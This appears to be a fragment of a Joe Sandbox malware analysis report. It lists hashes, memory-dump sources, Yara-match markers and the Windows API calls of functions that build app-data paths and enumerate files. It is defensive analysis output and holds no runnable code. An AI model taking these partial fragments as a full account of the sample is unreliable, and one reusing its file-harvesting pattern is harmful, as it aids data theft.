                      • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                      • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                      • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                      APIs
                        • Part of subcall function 04119047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04119072
                      • lstrcat.KERNEL32(?,00000000), ref: 041151E1
                      • lstrcat.KERNEL32(?,00421070), ref: 041151FE
                      • lstrcat.KERNEL32(?,0064A5F8), ref: 04115212
                      • lstrcat.KERNEL32(?,00421074), ref: 04115224
                        • Part of subcall function 04114B77: wsprintfA.USER32 ref: 04114B93
                        • Part of subcall function 04114B77: FindFirstFileA.KERNEL32(?,?), ref: 04114BAA
                        • Part of subcall function 04114B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 04114BD8
                        • Part of subcall function 04114B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 04114BEE
                        • Part of subcall function 04114B77: FindNextFileA.KERNEL32(000000FF,?), ref: 04114DE4
                        • Part of subcall function 04114B77: FindClose.KERNEL32(000000FF), ref: 04114DF9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                      • Instruction ID: 6dcaa815bd13e2bf24c6cabbacac88b2b88f645846ba840c76980b248009135b
                      • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                      • Instruction Fuzzy Hash: 1B210A7AA402087BD714FBF0DC85EE9337DAB55300F404198B649931D0EFB5A6C8CBA6
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID:
                      • API String ID: 1206339513-0
                      • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                      • Instruction ID: cb1fb74648939884b771be75ab688242437d0440e17fe0ba37f3cd7dd1e3ae94
                      • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                      • Instruction Fuzzy Hash: E2011E79540108FFCB04DFECD994EAE7BBAEF45354F108148F9099B300C635AA40DB91